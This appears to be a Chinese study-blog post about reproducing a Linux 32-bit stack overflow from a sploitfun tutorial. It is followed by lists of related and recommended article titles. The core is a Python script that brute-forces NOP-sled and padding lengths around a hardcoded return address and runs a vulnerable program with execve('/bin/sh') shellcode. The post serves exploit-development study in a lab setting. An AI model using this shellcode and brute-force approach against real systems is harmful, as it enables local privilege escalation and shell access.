学习Linux BOF的时候,看了这个文章,https://sploitfun.wordpress.com/2015/06/23/integer-overflow/ ,原文给出的exp无法成功, 此时除了计算并填充buf还可以用其他方法来复现这个问题:

#!/usr/bin/env python
import struct
from subprocess import call def fuzzme(i,j):
print i,j
arg1 = "sploitfun" #stack address where shellcode is copied.
ret_addr = 0xbfffefb0 #spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" #endianess convertion
def conv(num):
return struct.pack("<I",num) # arg2 = Junk + RA + NOP's + Shellcode
arg2 = "A" * 24
arg2 += conv(ret_addr);
arg2 += "\x90" * i
arg2 += scode
arg2 += "C" * j print "Calling vulnerable program"
call(["./vuln", arg1, arg2]) if __name__ == '__main__':
for i in range(1,300):
for j in range(1,300):
fuzzme(i,j)



简单粗暴...

A trick in Exploit Dev的更多相关文章

  1. reds Virtual Memory

    Virtual Memory technical specification This document details the internals of the Redis Virtual Memo ...

  2. redis虚拟内存---官方文档

    http://redis.io/topics/internals-vm Virtual Memory technical specification This document details the ...

  3. BlackArch-Tools

    BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...

  4. /dev/socket/vold exploit 本地提权漏洞

    EXPLOIT "0 asec create ../../../../../../../../xxxxx/xx/xx/xx 1 ext4 98235792350852308254872354 ...

  5. An iOS zero-click radio proximity exploit odyssey

    NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 1 ...

  6. Machine Learning Trick of the Day (2): Gaussian Integral Trick

    Machine Learning Trick of the Day (2): Gaussian Integral Trick Today's trick, the Gaussian integral ...

  7. Machine Learning Trick of the Day (1): Replica Trick

    Machine Learning Trick of the Day (1): Replica Trick 'Tricks' of all sorts are used throughout machi ...

  8. Plain text considered harmful: A cross-domain exploit

    referer:http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/ Data from aro ...

  9. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

随机推荐

  1. C 计算金额

    #include <stdio.h> int main(int argc, char **argv) { \\定义两个变量 a金额 z跟票面 int a=0; int z=0;\\ 输入金 ...

  2. Python 学习笔记之—— PIL 库

    PIL,全称 Python Imaging Library,是 Python 平台一个功能非常强大而且简单易用的图像处理库.但是,由于 PIL 仅支持到Python 2.7,加上年久失修,于是一群志愿 ...

  3. Windows Server 2008 R2 WEB 服务器安全设置指南

    http://wenku.baidu.com/view/9b66c51449649b6649d747a2.html?from=search http://wenku.baidu.com/view/84 ...

  4. HDU 4714 Tree2cycle(树状DP)(2013 ACM/ICPC Asia Regional Online ―― Warmup)

    Description A tree with N nodes and N-1 edges is given. To connect or disconnect one edge, we need 1 ...

  5. centos tomcat开机自启

    在 /etc/rc.local 下 输入tomcat bin目录下的startup.sh  /usr/tomcat8/bin/startup.sh 即可

  6. lock关键字的使用

    最近在代码中,发现别人使用了lock关键字,为了理解别人写的代码,所以自己对lock关键字的使用研究了下. 微软官方解释,请百度:lock 语句(C# 参考) 微软给了个官网实例代码: class A ...

  7. lintcode-86-二叉查找树迭代器

    86-二叉查找树迭代器 设计实现一个带有下列属性的二叉查找树的迭代器: 元素按照递增的顺序被访问(比如中序遍历) next()和hasNext()的询问操作要求均摊时间复杂度是O(1) 样例 对于下列 ...

  8. RunKit & NPM

    RunKit + NPM Try any Node.js package right in your browser https://npm.runkit.com/segmentit

  9. 批处理中的IF详解

    在CMD使用IF /?打开IF的系统帮助会发现IF有3种基本的用法! 第一种用法:IF [NOT] ERRORLEVEL number command 这种用法现在很少用了,因为它需要使用到CHOIC ...

  10. 使用ExecutorService实现线程池

    ExecutorService是java提供的用于管理线程池的类. 线程池的作用: - 控制线程数量 - 重用线程 当一个程序中创建了许多线程,并在任务结束后销毁,会给系统带来过度消耗资源,以及过度切 ...